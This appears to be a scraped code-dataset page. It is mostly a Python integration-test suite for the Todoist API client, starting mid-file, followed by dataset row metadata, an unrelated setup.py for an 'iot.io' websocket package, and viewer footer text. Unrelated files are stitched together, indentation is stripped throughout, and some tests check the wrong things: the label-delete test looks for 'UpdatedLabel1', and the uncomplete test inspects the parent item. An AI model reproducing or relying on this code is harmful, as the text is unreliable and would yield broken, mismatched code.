api = todoist.api.TodoistAPI(api_token, api_endpoint)
api.sync()
project1 = api.projects.add('Project1')
api.commit()
project2 = api.projects.add('Project2')
api.commit()
project2.move(project1['id'])
response = api.commit()
assert response['projects'][0]['name'] == 'Project2'
assert response['projects'][0]['parent_id'] == project1['id']
assert project1['id'] in [
i['parent_id'] for i in api.state['projects'] if i['id'] == project2['id']
]
project2.delete()
api.commit()
project1.delete()
api.commit()
def test_project_reorder(cleanup, api_endpoint, api_token):
api = todoist.api.TodoistAPI(api_token, api_endpoint)
api.sync()
project1 = api.projects.add('Project1')
api.commit()
project2 = api.projects.add('Project2')
api.commit()
api.projects.reorder(projects=[
{'id': project1['id'], 'child_order': 2},
{'id': project2['id'], 'child_order': 1},
])
response = api.commit()
for project in response['projects']:
if project['id'] == project1['id']:
assert project['child_order'] == 2
if project['id'] == project2['id']:
assert project['child_order'] == 1
assert 2 in [
p['child_order'] for p in api.state['projects']
if p['id'] == project1['id']
]
assert 1 in [
p['child_order'] for p in api.state['projects']
if p['id'] == project2['id']
]
project1.delete()
api.commit()
project2.delete()
api.commit()
def test_item_add(cleanup, api_endpoint, api_token):
api = todoist.api.TodoistAPI(api_token, api_endpoint)
api.sync()
response = api.add_item('Item1')
assert response['content'] == 'Item1'
api.sync()
assert 'Item1' in [i['content'] for i in api.state['items']]
item1 = [i for i in api.state['items'] if i['content'] == 'Item1'][0]
assert api.items.get_by_id(item1['id']) == item1
item1.delete()
api.commit()
def test_item_delete(cleanup, api_endpoint, api_token):
api = todoist.api.TodoistAPI(api_token, api_endpoint)
api.sync()
item1 = api.items.add('Item1')
api.sync()
item1.delete()
response = api.commit()
assert response['items'][0]['id'] == item1['id']
assert response['items'][0]['is_deleted'] == 1
assert 'Item1' not in [i['content'] for i in api.state['items']]
def test_item_update(cleanup, api_endpoint, api_token):
api = todoist.api.TodoistAPI(api_token, api_endpoint)
api.sync()
item1 = api.items.add('Item1')
api.commit()
item1.update(content='UpdatedItem1')
response = api.commit()
assert response['items'][0]['content'] == 'UpdatedItem1'
assert 'UpdatedItem1' in [i['content'] for i in api.state['items']]
assert api.items.get_by_id(item1['id']) == item1
item1.delete()
api.commit()
def test_item_complete(cleanup, api_endpoint, api_token):
api = todoist.api.TodoistAPI(api_token, api_endpoint)
api.sync()
item1 = api.items.add('Item1')
api.commit()
item2 = api.items.add('Item2', parent_id=item1['id'])
api.commit()
item2.complete()
response = api.commit()
assert response['items'][0]['content'] == 'Item2'
assert response['items'][0]['checked'] == 1
assert 1 in [
i['checked'] for i in api.state['items'] if i['id'] == item2['id']
]
item1.delete()
api.commit()
item2.delete()
api.commit()
def test_item_uncomplete(cleanup, api_endpoint, api_token):
api = todoist.api.TodoistAPI(api_token, api_endpoint)
api.sync()
item1 = api.items.add('Item1')
api.commit()
item2 = api.items.add('Item2', parent_id=item1['id'])
api.commit()
item2.complete()
api.commit()
item2.uncomplete()
response = api.commit()
assert response['items'][0]['content'] == 'Item2'
assert response['items'][0]['checked'] == 0
assert 0 in [
i['checked'] for i in api.state['items'] if i['id'] == item1['id']
]
item1.delete()
api.commit()
item2.delete()
api.commit()
def test_item_archive(cleanup, api_endpoint, api_token):
api = todoist.api.TodoistAPI(api_token, api_endpoint)
api.sync()
item1 = api.items.add('Item1')
api.commit()
item2 = api.items.add('Item2', parent_id=item1['id'])
api.commit()
item2.complete()
api.commit()
item2.archive()
response = api.commit()
assert response['items'][0]['content'] == 'Item2'
assert response['items'][0]['in_history'] == 1
assert 1 in [
i['in_history'] for i in api.state['items'] if i['id'] == item2['id']
]
item1.delete()
api.commit()
item2.delete()
api.commit()
def test_item_unarchive(cleanup, api_endpoint, api_token):
api = todoist.api.TodoistAPI(api_token, api_endpoint)
api.sync()
item1 = api.items.add('Item1')
api.commit()
item2 = api.items.add('Item2', parent_id=item1['id'])
api.commit()
item2.complete()
api.commit()
item2.archive()
api.commit()
item2.unarchive()
response = api.commit()
assert response['items'][0]['content'] == 'Item2'
assert response['items'][0]['in_history'] == 0
assert 0 in [
i['in_history'] for i in api.state['items'] if i['id'] == item2['id']
]
item1.delete()
api.commit()
item2.delete()
api.commit()
def test_item_move_to_project(cleanup, api_endpoint, api_token):
api = todoist.api.TodoistAPI(api_token, api_endpoint)
api.sync()
item1 = api.items.add('Item1')
api.commit()
project1 = api.projects.add('Project1')
api.commit()
item1.move(project_id=project1['id'])
response = api.commit()
assert response['items'][0]['content'] == 'Item1'
assert response['items'][0]['project_id'] == project1['id']
assert project1['id'] in [
i['project_id'] for i in api.state['items'] if i['id'] == item1['id']
]
item1.delete()
api.commit()
project1.delete()
api.commit()
def test_item_move_to_parent(cleanup, api_endpoint, api_token):
api = todoist.api.TodoistAPI(api_token, api_endpoint)
api.sync()
item1 = api.items.add('Item1')
api.commit()
item2 = api.items.add('Item2')
api.commit()
item2.move(parent_id=item1['id'])
response = api.commit()
assert response['items'][0]['content'] == 'Item2'
assert response['items'][0]['parent_id'] == item1['id']
assert item1['id'] in [
i['parent_id'] for i in api.state['items'] if i['id'] == item2['id']
]
item1.delete()
api.commit()
item2.delete()
api.commit()
def test_item_update_date_complete(cleanup, api_endpoint, api_token):
api = todoist.api.TodoistAPI(api_token, api_endpoint)
api.sync()
item1 = api.items.add('Item1', due={'string': 'every day'})
api.commit()
now = time.time()
tomorrow = time.gmtime(now + 24 * 3600)
new_date_utc = time.strftime("%Y-%m-%dT%H:%M:%SZ", tomorrow)
due = {
'date': new_date_utc,
'string': 'every day',
}
api.items.update_date_complete(item1['id'], due=due)
response = api.commit()
assert response['items'][0]['due']['string'] == 'every day'
assert 'every day' in [
i['due']['string'] for i in api.state['items'] if i['id'] == item1['id']
]
item1.delete()
api.commit()
def test_item_reorder(cleanup, api_endpoint, api_token):
api = todoist.api.TodoistAPI(api_token, api_endpoint)
api.sync()
item1 = api.items.add('Item1')
api.commit()
item2 = api.items.add('Item2')
api.commit()
api.items.reorder(items=[
{'id': item1['id'], 'child_order': 2},
{'id': item2['id'], 'child_order': 1},
])
response = api.commit()
for item in response['items']:
if item['id'] == item1['id']:
assert item['child_order'] == 2
if item['id'] == item2['id']:
assert item['child_order'] == 1
assert 2 in [
p['child_order'] for p in api.state['items']
if p['id'] == item1['id']
]
assert 1 in [
p['child_order'] for p in api.state['items']
if p['id'] == item2['id']
]
item1.delete()
api.commit()
item2.delete()
api.commit()
def test_item_update_day_orders(cleanup, api_endpoint, api_token):
api = todoist.api.TodoistAPI(api_token, api_endpoint)
api.sync()
item1 = api.items.add('Item1')
api.commit()
item2 = api.items.add('Item2')
api.commit()
api.items.update_day_orders({item1['id']: 1, item2['id']: 2})
response = api.commit()
for item in response['items']:
if item['id'] == item1['id']:
assert item['day_order'] == 1
if item['id'] == item2['id']:
assert item['day_order'] == 2
assert 1 == api.state['day_orders'][str(item1['id'])]
assert 2 == api.state['day_orders'][str(item2['id'])]
item1.delete()
api.commit()
item2.delete()
api.commit()
def test_label_add(cleanup, api_endpoint, api_token):
api = todoist.api.TodoistAPI(api_token, api_endpoint)
api.sync()
label1 = api.labels.add('Label1')
response = api.commit()
assert response['labels'][0]['name'] == 'Label1'
assert 'Label1' in [l['name'] for l in api.state['labels']]
assert api.labels.get_by_id(label1['id']) == label1
label1.delete()
api.commit()
def test_label_delete(cleanup, api_endpoint, api_token):
api = todoist.api.TodoistAPI(api_token, api_endpoint)
api.sync()
label1 = api.labels.add('Label1')
api.commit()
label1.delete()
response = api.commit()
assert response['labels'][0]['id'] == label1['id']
assert response['labels'][0]['is_deleted'] == 1
assert 'UpdatedLabel1' not in [l['name'] for l in api.state['labels']]
def test_label_update(cleanup, api_endpoint, api_token):
api = todoist.api.TodoistAPI(api_token, api_endpoint)
api.sync()
label1 = api.labels.add('Label1')
api.commit()
label1.update(name='UpdatedLabel1')
response = api.commit()
assert response['labels'][0]['name'] == 'UpdatedLabel1'
assert 'UpdatedLabel1' in [l['name'] for l in api.state['labels']]
assert api.labels.get_by_id(label1['id']) == label1
label1.delete()
api.commit()
def test_label_update_orders(cleanup, api_endpoint, api_token):
api = todoist.api.TodoistAPI(api_token, api_endpoint)
api.sync()
label1 = api.labels.add('Label1')
api.commit()
label2 = api.labels.add('Label2')
api.commit()
api.labels.update_orders({label1['id']: 1, label2['id']: 2})
response = api.commit()
for label in response['labels']:
if label['id'] == label1['id']:
assert label['item_order'] == 1
if label['id'] == label2['id']:
assert label['item_order'] == 2
assert 1 in [
l['item_order'] for l in api.state['labels'] if l['id'] == label1['id']
]
assert 2 in [
l['item_order'] for l in api.state['labels'] if l['id'] == label2['id']
]
label1.delete()
api.commit()
label2.delete()
api.commit()
def test_note_add(cleanup, api_endpoint, api_token):
api = todoist.api.TodoistAPI(api_token, api_endpoint)
api.sync()
item1 = api.items.add('Item1')
api.commit()
note1 = api.notes.add(item1['id'], 'Note1')
response = api.commit()
assert response['notes'][0]['content'] == 'Note1'
assert 'Note1' in [n['content'] for n in api.state['notes']]
assert api.notes.get_by_id(note1['id']) == note1
note1.delete()
api.commit()
item1.delete()
api.commit()
def test_note_delete(cleanup, api_endpoint, api_token):
api = todoist.api.TodoistAPI(api_token, api_endpoint)
api.sync()
item1 = api.items.add('Item1')
api.commit()
note1 = api.notes.add(item1['id'], 'Note1')
api.commit()
note1.delete()
response = api.commit()
assert response['notes'][0]['id'] == note1['id']
assert response['notes'][0]['is_deleted'] == 1
assert 'UpdatedNote1' not in [n['content'] for n in api.state['notes']]
note1.delete()
api.commit()
item1.delete()
api.commit()
def test_note_update(cleanup, api_endpoint, api_token):
api = todoist.api.TodoistAPI(api_token, api_endpoint)
api.sync()
item1 = api.items.add('Item1')
api.commit()
note1 = api.notes.add(item1['id'], 'Note1')
api.commit()
note1.update(content='UpdatedNote1')
response = api.commit()
assert response['notes'][0]['content'] == 'UpdatedNote1'
assert 'UpdatedNote1' in [n['content'] for n in api.state['notes']]
assert api.notes.get_by_id(note1['id']) == note1
note1.delete()
api.commit()
item1.delete()
api.commit()
def test_projectnote_add(cleanup, api_endpoint, api_token):
api = todoist.api.TodoistAPI(api_token, api_endpoint)
api.sync()
project1 = api.projects.add('Project1')
api.commit()
note1 = api.project_notes.add(project1['id'], 'Note1')
response = api.commit()
assert response['project_notes'][0]['content'] == 'Note1'
assert 'Note1' in [n['content'] for n in api.state['project_notes']]
assert api.project_notes.get_by_id(note1['id']) == note1
note1.delete()
api.commit()
project1.delete()
api.commit()
def test_projectnote_delete(cleanup, api_endpoint, api_token):
api = todoist.api.TodoistAPI(api_token, api_endpoint)
api.sync()
project1 = api.projects.add('Project1')
api.commit()
note1 = api.project_notes.add(project1['id'], 'Note1')
api.commit()
note1.delete()
response = api.commit()
assert response['project_notes'][0]['id'] == note1['id']
assert response['project_notes'][0]['is_deleted'] == 1
assert 'UpdatedNote1' not in [
n['content'] for n in api.state['project_notes']
]
project1.delete()
api.commit()
def test_projectnote_update(cleanup, api_endpoint, api_token):
api = todoist.api.TodoistAPI(api_token, api_endpoint)
api.sync()
project1 = api.projects.add('Project1')
api.commit()
note1 = api.project_notes.add(project1['id'], 'Note1')
api.commit()
note1.update(content='UpdatedNote1')
response = api.commit()
assert response['project_notes'][0]['content'] == 'UpdatedNote1'
assert 'UpdatedNote1' in [n['content'] for n in api.state['project_notes']]
assert api.project_notes.get_by_id(note1['id']) == note1
note1.delete()
api.commit()
project1.delete()
api.commit()
def test_filter_add(cleanup, api_endpoint, api_token):
api = todoist.api.TodoistAPI(api_token, api_endpoint)
api.sync()
filter1 = api.filters.add('Filter1', 'no due date')
response = api.commit()
assert response['filters'][0]['name'] == 'Filter1'
assert 'Filter1' in [f['name'] for f in api.state['filters']]
assert api.filters.get_by_id(filter1['id']) == filter1
filter1.delete()
api.commit()
def test_filter_delete(cleanup, api_endpoint, api_token):
api = todoist.api.TodoistAPI(api_token, api_endpoint)
api.sync()
filter1 = api.filters.add('Filter1', 'no due date')
api.commit()
filter1.delete()
response = api.commit()
assert response['filters'][0]['id'] == filter1['id']
assert response['filters'][0]['is_deleted'] == 1
assert 'Filter1' not in [p['name'] for p in api.state['filters']]
def test_filter_update(cleanup, api_endpoint, api_token):
api = todoist.api.TodoistAPI(api_token, api_endpoint)
api.sync()
filter1 = api.filters.add('Filter1', 'no due date')
api.commit()
filter1.update(name='UpdatedFilter1')
response = api.commit()
assert response['filters'][0]['name'] == 'UpdatedFilter1'
assert 'UpdatedFilter1' in [f['name'] for f in api.state['filters']]
assert api.filters.get_by_id(filter1['id']) == filter1
filter1.delete()
api.commit()
def test_filter_update_orders(cleanup, api_endpoint, api_token):
api = todoist.api.TodoistAPI(api_token, api_endpoint)
api.sync()
filter1 = api.filters.add('Filter1', 'no due date')
api.commit()
filter2 = api.filters.add('Filter2', 'today')
api.commit()
api.filters.update_orders({filter1['id']: 2, filter2['id']: 1})
response = api.commit()
for filter in response['filters']:
if filter['id'] == filter1['id']:
assert filter['item_order'] == 2
if filter['id'] == filter2['id']:
assert filter['item_order'] == 1
assert 2 in [
f['item_order'] for f in api.state['filters']
if f['id'] == filter1['id']
]
assert 1 in [
f['item_order'] for f in api.state['filters']
if f['id'] == filter2['id']
]
filter1.delete()
api.commit()
filter2.delete()
api.commit()
def test_reminder_relative_add(cleanup, api_endpoint, api_token):
api = todoist.api.TodoistAPI(api_token, api_endpoint)
api.sync()
item1 = api.items.add('Item1', due={'string': 'tomorrow 5pm'})
api.commit()
reminder1 = api.reminders.add(item1['id'], minute_offset=30)
response = api.commit()
assert response['reminders'][0]['minute_offset'] == 30
assert reminder1['id'] in [p['id'] for p in api.state['reminders']]
assert api.reminders.get_by_id(reminder1['id']) == reminder1
reminder1.delete()
api.commit()
item1.delete()
api.commit()
def test_reminder_relative_delete(cleanup, api_endpoint, api_token):
api = todoist.api.TodoistAPI(api_token, api_endpoint)
api.sync()
item1 = api.items.add('Item1', due={'string': 'tomorrow 5pm'})
api.commit()
reminder1 = api.reminders.add(item1['id'], minute_offset=30)
api.commit()
reminder1.delete()
response = api.commit()
assert response['reminders'][0]['is_deleted'] == 1
assert reminder1['id'] not in [p['id'] for p in api.state['reminders']]
item1.delete()
api.commit()
def test_reminder_relative_update(cleanup, api_endpoint, api_token):
api = todoist.api.TodoistAPI(api_token, api_endpoint)
api.sync()
item1 = api.items.add('Item1', due={'string': 'tomorrow 5pm'})
api.commit()
reminder1 = api.reminders.add(item1['id'], minute_offset=30)
api.commit()
reminder1.update(minute_offset=str(15))
response = api.commit()
assert response['reminders'][0]['minute_offset'] == 15
assert reminder1['id'] in [p['id'] for p in api.state['reminders']]
assert api.reminders.get_by_id(reminder1['id']) == reminder1
reminder1.delete()
api.commit()
item1.delete()
api.commit()
def test_reminder_absolute_add(cleanup, api_endpoint, api_token):
api = todoist.api.TodoistAPI(api_token, api_endpoint)
api.sync()
item1 = api.items.add('Item1', due={'string': 'tomorrow 5pm'})
api.commit()
now = time.time()
tomorrow = time.gmtime(now + 24 * 3600)
due_date_utc = time.strftime("%Y-%m-%dT%H:%M:%SZ", tomorrow)
reminder1 = api.reminders.add(item1['id'], due={'date': due_date_utc})
response = api.commit()
assert response['reminders'][0]['due']['date'] == due_date_utc
tomorrow = time.gmtime(time.time() + 24 * 3600)
assert reminder1['id'] in [p['id'] for p in api.state['reminders']]
assert api.reminders.get_by_id(reminder1['id']) == reminder1
reminder1.delete()
api.commit()
item1.delete()
api.commit()
def test_reminder_absolute_delete(cleanup, api_endpoint, api_token):
api = todoist.api.TodoistAPI(api_token, api_endpoint)
api.sync()
item1 = api.items.add('Item1', due={'string': 'tomorrow 5pm'})
api.commit()
now = time.time()
tomorrow = time.gmtime(now + 24 * 3600)
due_date_utc = time.strftime("%Y-%m-%dT%H:%M:%SZ", tomorrow)
reminder1 = api.reminders.add(item1['id'], due={'date': due_date_utc})
api.commit()
api.reminders.delete(reminder1['id'])
response = api.commit()
assert response['reminders'][0]['is_deleted'] == 1
assert reminder1['id'] not in [p['id'] for p in api.state['reminders']]
item1.delete()
response = api.commit()
def test_reminder_absolute_update(cleanup, api_endpoint, api_token):
api = todoist.api.TodoistAPI(api_token, api_endpoint)
api.sync()
item1 = api.items.add('Item1', due={'string': 'tomorrow 5pm'})
api.commit()
now = time.time()
tomorrow = time.gmtime(now + 24 * 3600)
due_date_utc = time.strftime("%Y-%m-%dT%H:%M:%SZ", tomorrow)
reminder1 = api.reminders.add(item1['id'], due={'date': due_date_utc})
api.commit()
tomorrow = time.gmtime(now + 24 * 3600 + 60)
due_date_utc = time.strftime("%Y-%m-%dT%H:%M:%SZ", tomorrow)
api.reminders.update(reminder1['id'], due_date_utc=due_date_utc)
response = api.commit()
assert response['reminders'][0]['due']['date'] == due_date_utc
assert reminder1['id'] in [p['id'] for p in api.state['reminders']]
assert api.reminders.get_by_id(reminder1['id']) == reminder1
reminder1.delete()
api.commit()
item1.delete()
api.commit()
def test_locations(api_endpoint, api_token):
api = todoist.api.TodoistAPI(api_token, api_endpoint)
api.sync()
api.locations.clear()
api.commit()
assert api.state['locations'] == []
def test_live_notifications(api_endpoint, api_token):
api = todoist.api.TodoistAPI(api_token, api_endpoint)
api.sync()
api.live_notifications.set_last_read(
api.state['live_notifications_last_read_id'])
response = api.commit()
assert response['live_notifications_last_read_id'] == \
api.state['live_notifications_last_read_id']
def test_share_accept(cleanup, cleanup2, api_endpoint, api_token, api_token2):
api = todoist.api.TodoistAPI(api_token, api_endpoint)
api2 = todoist.api.TodoistAPI(api_token2, api_endpoint)
api.user.update(auto_invite_disabled=1)
api.commit()
api.sync()
api2.user.update(auto_invite_disabled=1)
api2.commit()
api2.sync()
project1 = api.projects.add('Project1')
api.commit()
api.projects.share(project1['id'], api2.state['user']['email'])
response = api.commit()
assert response['projects'][0]['name'] == project1['name']
assert response['projects'][0]['shared']
response2 = api2.sync()
invitation1 = next((ln for ln in response2['live_notifications']
if ln['notification_type'] == 'share_invitation_sent'),
None)
assert invitation1 is not None
assert invitation1['project_name'] == project1['name']
assert invitation1['from_user']['email'] == api.state['user']['email']
api2.invitations.accept(invitation1['id'],
invitation1['invitation_secret'])
response2 = api2.commit()
assert api2.state['user']['id'] in \
[p['user_id'] for p in api2.state['collaborator_states']]
api.sync()
project1 = [p for p in api.state['projects'] if p['name'] == 'Project1'][0]
project1.delete()
api.commit()
def test_share_reject(cleanup, cleanup2, api_endpoint, api_token, api_token2):
api = todoist.api.TodoistAPI(api_token, api_endpoint)
api2 = todoist.api.TodoistAPI(api_token2, api_endpoint)
api.user.update(auto_invite_disabled=1)
api.commit()
api.sync()
api2.user.update(auto_invite_disabled=1)
api2.commit()
api2.sync()
project1 = api.projects.add('Project1')
api.commit()
api.projects.share(project1['id'], api2.state['user']['email'])
response = api.commit()
assert response['projects'][0]['name'] == project1['name']
assert response['projects'][0]['shared']
response2 = api2.sync()
invitation2 = next((ln for ln in response2['live_notifications']
if ln['notification_type'] == 'share_invitation_sent'),
None)
assert invitation2 is not None
assert invitation2['project_name'] == project1['name']
assert invitation2['from_user']['email'] == api.state['user']['email']
api2.invitations.reject(invitation2['id'],
invitation2['invitation_secret'])
response2 = api2.commit()
assert len(response2['projects']) == 0
assert len(response2['collaborator_states']) == 0
project1 = [p for p in api.state['projects'] if p['name'] == 'Project1'][0]
project1.delete()
api.commit()
def test_share_delete(cleanup, cleanup2, api_endpoint, api_token, api_token2):
api = todoist.api.TodoistAPI(api_token, api_endpoint)
api2 = todoist.api.TodoistAPI(api_token2, api_endpoint)
api.user.update(auto_invite_disabled=1)
api.commit()
api.sync()
api2.user.update(auto_invite_disabled=1)
api2.commit()
api2.sync()
project1 = api.projects.add('Project1')
api.commit()
api.projects.share(project1['id'], api2.state['user']['email'])
response = api.commit()
assert response['projects'][0]['name'] == project1['name']
assert response['projects'][0]['shared']
response2 = api2.sync()
invitation3 = next((ln for ln in response2['live_notifications']
if ln['notification_type'] == 'share_invitation_sent'),
None)
assert invitation3 is not None
assert invitation3['project_name'] == project1['name']
assert invitation3['from_user']['email'] == api.state['user']['email']
api.invitations.delete(invitation3['id'])
api.commit()
project1 = [p for p in api.state['projects'] if p['name'] == 'Project1'][0]
project1.delete()
api.commit()
def test_templates(cleanup, api_endpoint, api_token):
api = todoist.api.TodoistAPI(api_token, api_endpoint)
api.sync()
project1 = api.projects.add('Project1')
project2 = api.projects.add('Project2')
api.commit()
item1 = api.items.add('Item1', project_id=project1['id'])
api.commit()
template = api.templates.export_as_file(project1['id'])
assert 'task,Item1,4,1' in template
with io.open('/tmp/example.csv', 'w', encoding='utf-8') as example:
example.write(template)
result = api.templates.import_into_project(project1['id'],
'/tmp/example.csv')
assert result == {'status': u'ok'}
item1.delete()
api.commit()
project1.delete()
api.commit()
project2.delete()
api.commit()
| 2.15625 | 2 |
setup.py | dylancrockett/iot.io | 0 | 6899 | from setuptools import setup
import iotio
with open("README.md", "r") as fh:
long_description = fh.read()
setup(
name="iot.io",
version=iotio.__version__,
packages=["iotio"],
author="<NAME>",
author_email="<EMAIL>",
license="MIT",
description="A management API for connecting and managing Clients via websocket connections.",
long_description=long_description,
long_description_content_type="text/markdown",
url="https://github.com/dylancrockett/iot.io",
project_urls={
"Documentation": "https://iotio.readthedocs.io/",
"Source Code": "https://github.com/dylancrockett/iot.io"
},
classifiers=[
"Programming Language :: Python :: 3",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent"
],
install_requires=[
'gevent',
'gevent-websocket',
'flask',
'flask-sockets',
],
python_requires='>=3.7'
)
| 1.539063 | 2 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.